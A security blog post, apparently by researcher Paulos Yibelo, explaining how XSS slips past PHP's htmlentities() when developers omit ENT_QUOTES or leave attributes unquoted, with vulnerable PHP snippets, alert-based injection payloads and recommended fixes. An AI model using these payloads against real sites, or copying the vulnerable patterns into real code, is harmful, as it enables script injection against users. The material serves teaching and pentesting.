Bypassing HTML Entities With Javascript

[The Security researcher Paulos Yibelo share with HOC that how he bypassing htmlentities().]

Well I don’t know how to break it down for you, you just can’t (if the function is used properly and exactly where it should). But it’s more probable that most developers don’t use it the right way, since it’s like a norm for some developers to not use built-in functions properly :P. So I will talk about some of the cases I came up while pentesting. htmlentities() and htmlspecailchars() are functions mainly developed to filter out cross site scripting attacks.

But I can promise you that you can build a better function if your user input is massive since that’s when most exploitation scenarios begin. How? Well, the functions html entity the characters < , > “ and ‘. So without those there seems there is no XSS. Or isn’t really? Well, I can think of one. Something like javascript:alert(1); will be executed since none of the characters in it are filtered to be html entityed… but there is a limitation to this. Without using “> or any similar technique we will not be able to break out of the attribute we are inside.

Also the value attribute in html is not vulnerable since it only accepts strings and well we need scripts that can execute… something like href, onclick would do… but who would put such a foolish mistake right? Well you wouldn’t believe if I told you even big companies like Facebook does. Have a code like?

print '<img src="'.htmlentities("$url").”';

or even

print "<a href='".htmlentities($url)."'>Click Here</a>";

“javascript:alert(1);” will bypass it because it doesn’t contain the characters that will be filtered. But notice a limitation here? Our code will only execute if user clicks the Click Here button. So that’s a huge limitation. Or is it? The html code will become something like

<a href='javascript:alert(1);'>Click Here</a>

But we need to break out of the href tag and execute a more malicious javascript. But how? If we try to break out of it using ‘> it won’t work since both those characters are filtered out… and the code will become something like

<a href='javascript:alert(1);&quot;&gt;'>Click Here</a>

Right? Well not exactly. Htmlentities comes with single quote ( ‘ ) not filtered by default and you have to specify a special switch called ENT_QUOTES to declare that. So the real output when values like “javascript:alert(1);’>” is given

<a href='javascript:alert(1);'&gt;'>Click Here</a>

A hope! We broke out of the attribute so giving values like

javascript:alert(1);’ onfocus=alert(1); autofocus

will output html source like

<a href='javascript:alert(1);' onfocus=alert(1); autofocus>Click Here</a>

So wow… our final payload to bypass the filter would look something like

paulos’ onfocus=alert(0); autofocus

Would successfully bypass the function htmlentities and prints out the source of

<a href='paulos' onfocus=alert(0) autofocus>Click Here</a>

Successful explotation of the function htmlentities. so why not use the switch to enable the single quote (‘) and make our code secured. something like

print "<a href='".htmlentities($url, ENT_QUOTES)."'>Click Here</a>";

Well now, we may can’t break out of the cage we are inside but still can execute JavaScript in the attribute we are inside. However, the value html attribute is off limits. we cannot execute JavaScript inside it. But when you find code like:

print "<input type='text' value=".htmlentities("$value").">";

even when using ENT_QUOTES, this is when value attribute becomes vulnerable.

paulos onmouseover=alert(1);

will successfully bypass the value parameter and make html code like

<input type='text' value=paulos onmouseover=alert(1);>

Cool.

So not using quotes got us vulnerable, we will just use quotes then. Well I recommend not using single quotes… that’s when your code nearly becomes vulnerable when you forgot to use the switch ENT_QUOTES, which you probably will.

But this isn’t just it… attackers can still attack your application using a different character set called UTF-7 even when you are using proper usage of htmlentities, so unless you protect your code by setting your charset to UTF-8 or any other charset other that 7, you are still vulnerable to XSS.